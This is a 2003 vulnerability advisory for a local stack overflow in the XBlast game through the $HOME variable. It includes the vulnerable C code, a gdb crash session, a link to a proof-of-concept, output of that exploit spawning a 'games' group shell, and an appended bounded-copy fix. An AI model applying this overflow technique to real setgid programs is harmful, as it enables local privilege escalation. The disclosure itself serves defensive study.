SecurityTracker.com

SecurityTracker Archives

Category:   Application (Game)  >   XBlast
Vendors:   Vogel, Oliver
XBlast Buffer Overflow in $HOME Variable Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1007252
SecurityTracker URL:  http://securitytracker.com/id/1007252
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 22 2003
Impact:   Execution of arbitrary code via local system, User access via local system

Version(s): 2.5.10; possibly other versions
Description:   c0wboy of 0x333 Outsiders Security Labs reported a buffer overflow vulnerability in the XBlast game. A local user may be able to gain elevated privileges on the system.

It is reported that a local user can set a specially crafted value for the $HOME environment variable to trigger a stack overflow in XBlast. Arbitrary code can be executed.

On systems that have XBlast configured with set group id (setgid) 'games' group privileges, the local user can obtain 'games' group privileges.

A demonstration exploit script is available at:

http://www.0x333.org/exploit/0x333xblast.c

Impact:   A local user can execute arbitrary code on the system, potentially with 'games' group privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  xblast.host.sk/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  *


xblast is affected by stack overflow.
thank you.
c0wboy

           -       0x333 OUTSIDERS SECURITY LABS       -
            -              www.0x333.org              -


~~~ contents ~~~

[0x0] Info
[0x1] Description
[0x2] Vulnerable code
[0x3] Debug session
[0x4] Exploit


[0x0] Info
Author      : c0wboy
Email       : c0wboy@tiscali.it
Date        : 23 July 2003
Advisory    : outsiders-003.txt
Vendor URL  : http://xblast.host.sk/
Category    : stackoverflow
OS affected : Linux, Unix


[0x1] Description

"XBlast is a multi-player arcade game for X11R5/R6 (v2.6 or TNT) and
Windows (TNT version only). The game can be played with at least two
players and up to six players. It was inspired by the video/computer
game Bomberman (Dynablaster), which was to my knowledge first programmed
for NEC's PC Engine/Turbo Grafx. Other commercial versions of the original
game exist for IBM-PC, Atari ST, Amiga [trop cool l'Amiga], NES,
GameBoy and Super NES."

xblast is affected by a stack overflow that can be triggered by passing a
long $HOME env. I have not had the occasion to test whether this program is
setgid under some Linux distro, but we can assume that it is +s games group.
The PoC exploit will spawn a shell with gid=20(games).


[0x2] Vulnerable code

In setup.c we found :

/*
 * local function list_setups
 */
#ifdef __STDC__
static char *
list_setups (void)
#else
static char *
list_setups ()
#endif
{
  char path[1024];
  char *result = NULL;
  char *home;
  DIR *dp;
  struct dirent *dirp;

  /* set path to setup dir */
  path[0] = '\0';
  if (NULL != (home = getenv("HOME") ) ) {
    strcpy(path, home);
  }
  strcat(path, file_setup_dir);


We have found an unchecked strcpy().


[0x3] Debug session

[root@0x333 c0wboy]# export HOME=`perl -e "print 'A' x 1337"`
[root@0x333 c0wboy]# gdb /usr/X11R6/bin/xblast
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols
found)...
(gdb) r
Starting program: /usr/X11R6/bin/xblast
(no debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...
(no debugging symbols found)...XBlast 2.5.10 Sound BETA Copyright (c) 1993-97
Oliver Vogel
Report any bugs to: vogel@ikp.uni-koeln.de
XBlast - Interactive Setup
(no debugging symbols found)...Load an old setup (y/n): y
/usr/X11R6/bin/xblast: Failed to read directory
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA/.xblast-setups.
 
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax            0x0      0
ecx            0x808a880        134785152
edx            0x57a    1402
ebx            0xbffff5ed       -1073744403
esp            0xbfffdcb8       0xbfffdcb8
ebp            0x41414141       0x41414141
esi            0x1      1
edi            0x8049fbc        134520764
eip            0x41414141       0x41414141
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb)

As we can see, we can control the flow of the process, by changing the
value of the ret-address.


[0x4] Exploit

A proof-of-concept exploit is available @ :

http://www.0x333.org/exploit/0x333xblast.c

[c0wboy@0x333 c0wboy]$ gcc 0x333xblast.c -o xblast
[c0wboy@0x333 c0wboy]$ ./xblast
 
 
 ---       xblast local exploit by c0wboy      ---
 --- Outsiders Se(c)urity Labs / www.0x333.org ---
 
 [NOW PRESS 'y' TO SPAWN THE SHELL]
 
XBlast 2.5.10 Sound BETA Copyright (c) 1993-97 Oliver Vogel
Report any bugs to: vogel@ikp.uni-koeln.de
XBlast - Interactive Setup
Load an old setup (y/n): y
			/usr/X11R6/bin/xblast: Failed to read directory ??????????????????
????????????????????????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????1?1?1ɳ??G̀1?Rhn/shh
//bi??RS???B?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?????!?`?/.xblast-setups.
sh-2.05b$ id
uid=500(c0wboy) gid=20(games) groups=500(c0wboy)
sh-2.05b$

EOF
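
A bounded replacement for the strcpy()/strcat() pair in the list_setups() excerpt above, added here as an illustration and not taken from the advisory or from the XBlast sources. The helper names build_setup_path and make_long_home are hypothetical, and the value of file_setup_dir is assumed from the suffix shown in the debug session.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SETUP_PATH_MAX 1024   /* same size as path[] in list_setups() */

/* Assumed value, inferred from the suffix printed in the debug session. */
static const char file_setup_dir[] = "/.xblast-setups";

/*
 * Build "<home><file_setup_dir>" in dst without writing past dstsz bytes.
 * Returns 0 on success, -1 if the result does not fit (dst is set to "").
 * A NULL home behaves like the original code: only the suffix is used.
 */
static int build_setup_path(char *dst, size_t dstsz, const char *home)
{
    int n;
    if (dst == NULL || dstsz == 0)
        return -1;
    /* snprintf writes at most dstsz bytes and returns the length it needed,
       so an oversized $HOME is rejected instead of silently truncated. */
    n = snprintf(dst, dstsz, "%s%s", home ? home : "", file_setup_dir);
    if (n < 0 || (size_t)n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed test input: a HOME value made of len 'A' bytes. */
static char *make_long_home(size_t len)
{
    char *s = malloc(len + 1);
    if (s != NULL) {
        memset(s, 'A', len);
        s[len] = '\0';
    }
    return s;
}

int main(void)
{
    char path[SETUP_PATH_MAX];
    char *big = make_long_home(1337);   /* length used in the debug session */
    printf("normal HOME: %d\n", build_setup_path(path, sizeof path, "/home/user"));
    printf("1337-byte HOME: %d\n", big ? build_setup_path(path, sizeof path, big) : -1);
    free(big);
    return 0;
}
```

A caller should treat the -1 return as a hard failure and skip the directory read instead of falling back to a truncated path.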
